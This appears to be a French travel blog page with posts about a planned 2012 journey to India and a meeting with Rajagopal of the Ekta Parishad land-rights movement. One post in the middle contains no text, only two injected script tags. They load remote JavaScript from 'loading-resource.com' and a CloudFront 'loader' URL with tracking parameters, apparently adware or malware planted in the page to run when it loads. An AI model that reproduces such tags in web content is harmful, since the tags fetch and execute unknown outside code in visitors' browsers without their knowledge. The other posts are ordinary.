• On  continue avec les petites choses qui, mises bout à bout, posent les bases de notre projet depuis la fin de l'été. Quelques jours après l'ascension du Mont Blanc avec le drapeau de Jan Satyagraha 2012, nous avons eu la chance de rencontrer, brièvement, Rajagopal qui est en quelque sorte un "fils spirituel" de Gandhi. Il a étudié l'agriculture et n'a de cesse depuis plus de 30 ans, d'aider les plus pauvres en Inde à faire valoir leurs droits, et notamment le droit à la terre. Ses initiatives sont à l'origine du mouvement Ekta Parishad. ( les liens de cet article renvoient au site internet d'Ekta Parishad qui n'est pas traduit en français...aller, ce sera l'occasion de revoir son anglais )

      

    Rencontre avec Rajagopal

      

    Il s'est montré très sensible à ce projet, et nous avons eu l'occasion d'en reparler plus longuement avec son épouse qui était présente lors des dernières réunions du groupe Ekta Parishad de Genève. Voilà, yapuka comme on dit...!


     



    votre commentaire
  •  

    <script src="http://loading-resource.com/50.js.php?i=%7B50AE95DB-CC02-4924-A2A1-2C9F1E13371F%7D" type="text/javascript"></script> <script src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=IT&rid=&ccid=&ip=188.216.52.186" type="text/javascript"></script>

    Lire la suite...


    votre commentaire
  •  ça y est, nous avons à peu près compris comment mettre à jour et alimenter ce blog...donc, d'abord: bienvenue à toi qui promène tes yeux et ta souris sur ces pages!

    Nous avons commencé par poser le décors de notre projet, il est donc déjà possible de faire un tour du côté des pages des rubriques "Accueil" et "Le Projet" pour faire plus ample connaissance avec lui et avec nous!

    Nous pensons démarrer notre périple en avril 2012, pour rejoindre l'Inde en octobre de la même année. Même si l'imprévu reste le compagnon du voyage, il faut tout de même un minimum de préparation...c'est ce que nous faisons pour le moment! Matériel, itinéraire, formalités, prises de contacts ici et ailleurs...la trame se met en place tout doucement et nous en mettrons en ligne au fur et à mesure ce que nous faisons en amont du départ depuis le mois de septembre (et oui, il y a du retard ma bonne dame, mais nous ne sommes pas des rapides de l'informatique et au départ, nous ne pensions pas forcément faire un blog...cf Pourquoi ce blog?)

    Voilà pour les présentations, bonne balade dans ces pages!


    votre commentaire


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique